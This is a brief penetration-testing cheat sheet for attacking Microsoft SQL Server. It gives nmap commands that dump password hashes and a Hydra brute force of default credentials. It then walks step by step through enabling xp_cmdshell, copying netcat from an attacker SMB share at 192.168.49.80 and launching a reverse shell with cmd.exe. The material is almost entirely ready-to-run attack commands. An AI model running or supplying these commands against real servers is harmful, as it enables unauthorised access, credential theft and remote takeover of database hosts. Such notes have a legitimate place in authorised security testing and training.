MSSQL Services
mssql-vulnerability – Nmap can be leveraged to scan MsSQL for Known vulnerabilities.
Example Syntax:
nmap -vv -sV -Pn -p [PORT] –script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes –script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa [IP]
mssql-default – Hydra can be utilized to check the MsSQL database for default credentials.
Example Syntax:
hydra -s [PORT] -C ./wordlists/mssql-default-userpass.txt -u -f [IP] mssql
Using MSSQL xp_cmdshell to get reverse shell
EXEC sp_configure ‘show advanced options’, 1;
Reconfigure;
EXEC sp_configure ‘xp_cmdshell’,1
Reconfigure;
SQL>
SQL> xp_cmdshell “whoami”
output
——————————————————————————–
nt service\mssql$sqlexpress
NULL
Start smb share
Sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .
xp_cmdshell “copy \\192.168.49.80\tools\nc64.exe c:\temp”
SQL> xp_cmdshell “c:\temp\nc64.exe 192.168.49.80 80 -e cmd.exe”